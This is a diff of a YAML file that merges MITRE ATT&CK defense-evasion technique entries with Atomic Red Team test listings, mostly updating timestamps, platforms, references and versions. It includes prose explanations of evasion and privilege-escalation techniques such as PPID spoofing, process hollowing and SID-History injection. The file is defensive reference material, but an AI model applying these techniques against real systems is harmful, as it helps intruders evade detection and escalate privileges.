         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -16651,7 +16753,6 @@ defense-evasion:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests:
     - name: Parent PID Spoofing using PowerShell
@@ -16911,7 +17012,7 @@ defense-evasion:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -16938,11 +17039,10 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -16996,7 +17096,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1574.013:
     technique:
@@ -17032,7 +17131,7 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -17058,8 +17157,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.004:
     technique:
@@ -17085,7 +17182,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -17107,8 +17204,6 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1218.001:
     technique:
@@ -17174,7 +17269,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.001
     atomic_tests:
     - name: Compiled HTML Help Local Payload
@@ -17424,7 +17518,7 @@ defense-evasion:
         name: command_prompt
   T1070.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-13T17:15:56.948Z'
       name: 'Indicator Removal on Host: Network Share Connection Removal'
       description: 'Adversaries may remove share connections that are no longer useful
         in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -17479,7 +17573,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.005
     atomic_tests:
     - name: Add Network Share
@@ -17715,7 +17808,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.001
     atomic_tests:
     - name: Unload Sysmon Filter Driver
@@ -18657,7 +18749,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:47.635Z'
       name: Modify System Image
       description: |-
         Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -18692,8 +18784,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574:
     technique:
@@ -18759,7 +18849,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.005:
     technique:
@@ -18785,7 +18874,7 @@ defense-evasion:
         Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
 
         A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:07:48.062Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Indicator Removal from Tools
       x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -18810,11 +18899,10 @@ defense-evasion:
       - Signature-based detection
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -18831,7 +18919,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -18841,7 +18928,7 @@ defense-evasion:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -18850,19 +18937,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -18910,11 +18995,12 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -18982,18 +19068,17 @@ defense-evasion:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests:
     - name: Process Hollowing using PowerShell
@@ -19163,7 +19248,7 @@ defense-evasion:
         Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
 
         Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:10:23.890Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Resource Forking
       x_mitre_detection: "Identify files with the <code>com.apple.ResourceFork</code>
@@ -19185,7 +19270,6 @@ defense-evasion:
       - Gatekeeper
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027:
     technique:
@@ -19260,6 +19344,7 @@ defense-evasion:
       - 'Script: Script Execution'
       - 'File: File Creation'
       - 'Module: Module Load'
+      - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'File: File Metadata'
       - 'Process: OS API Execution'
@@ -19319,7 +19404,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027
     atomic_tests:
     - name: Execute base64-encoded PowerShell
@@ -19572,7 +19656,7 @@ defense-evasion:
         name: command_prompt
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -19601,24 +19685,26 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -19653,9 +19739,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.001:
     technique:
@@ -19678,7 +19761,7 @@ defense-evasion:
         url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
         description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
           Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-02-10T19:52:47.724Z'
       name: Invalid Code Signature
       description: |-
         Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -19696,8 +19779,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.006:
     technique:
@@ -19736,7 +19817,7 @@ defense-evasion:
         description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
           - Using virtual machines to persist and evade detections. Retrieved September
           22, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T22:21:59.708Z'
       name: Run Virtual Instance
       description: |-
         Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -19779,8 +19860,6 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.006
     atomic_tests:
     - name: Register Portable Virtualbox
@@ -19944,6 +20023,76 @@ defense-evasion:
         cleanup_command: |-
           Stop-VM $VM -Force
           Remove-VM $VM -Force
+  T1027.014:
+    technique:
+      modified: '2024-10-09T18:56:28.092Z'
+      name: Polymorphic Code
+      description: "Adversaries may utilize polymorphic code (also known as metamorphic
+        or mutating code) to evade detection. Polymorphic code is a type of software
+        capable of changing its runtime footprint during code execution.(Citation:
+        polymorphic-blackberry) With each execution of the software, the code is mutated
+        into a different version of itself that achieves the same purpose or objective
+        as the original. This functionality enables the malware to evade traditional
+        signature-based defenses, such as antivirus and antimalware tools.(Citation:
+        polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+        with polymorphic code to accomplish the intended effects, including using
+        mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+        [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+        File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+        polymorphic-medium)\n"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+      - TruKno
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      - 'File: File Creation'
+      - 'File: File Metadata'
+      x_mitre_defense_bypassed:
+      - Signature-based Detection
+      type: attack-pattern
+      id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+      created: '2024-09-27T12:28:03.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/014
+        external_id: T1027.014
+      - source_name: polymorphic-blackberry
+        description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+          27, 2024.
+        url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+      - source_name: polymorphic-sentinelone
+        description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+          and Challenges. Retrieved September 27, 2024.
+        url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+      - source_name: polymorphic-medium
+        description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+          Retrieved September 27, 2024.'
+        url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+      - source_name: polymorphic-linkedin
+        description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+          and hindering analysis: Packing up and unpacking stuff. Retrieved September
+          27, 2024.'
+        url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1134.005:
     technique:
       x_mitre_platforms:
@@ -19987,7 +20136,7 @@ defense-evasion:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -20012,8 +20161,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests:
     - name: Injection SID-History with mimikatz
@@ -20092,7 +20239,7 @@ defense-evasion:
         Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
 
         When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:05:44.200Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Boundary Bridging
       x_mitre_detection: |-
@@ -20111,7 +20258,6 @@ defense-evasion:
       - System Access Controls
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1553:
     technique:
@@ -20206,11 +20352,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -20290,11 +20435,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:24:56.148Z'
       name: 'Signed Binary Proxy Execution: Regsvr32'
       description: |-
         Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -20359,7 +20503,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.010
     atomic_tests:
     - name: Regsvr32 local COM scriptlet execution
@@ -20535,7 +20678,7 @@ defense-evasion:
         name: command_prompt
   T1036.003:
     technique:
-      modified: '2023-09-14T21:12:48.411Z'
+      modified: '2024-09-12T19:30:45.065Z'
       name: 'Masquerading: Rename System Utilities'
       description: 'Adversaries may rename legitimate system utilities to try to evade
         security mechanisms concerning the usage of those utilities. Security monitoring
@@ -20584,8 +20727,8 @@ defense-evasion:
         external_id: T1036.003
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -20600,9 +20743,8 @@ defense-evasion:
         url: https://lolbas-project.github.io/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.003
     atomic_tests:
     - name: Masquerading as Windows LSASS process
@@ -20765,7 +20907,7 @@ defense-evasion:
         elevation_required: true
   T1562.011:
     technique:
-      modified: '2023-04-12T22:46:33.995Z'
+      modified: '2024-10-16T20:12:44.962Z'
       name: Spoof Security Alerting
       description: |-
         Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -20777,7 +20919,7 @@ defense-evasion:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -20807,13 +20949,12 @@ defense-evasion:
         url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -20874,7 +21015,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests:
     - name: Execution of program.exe as service with unquoted service path
@@ -20958,11 +21098,10 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -20986,11 +21125,10 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
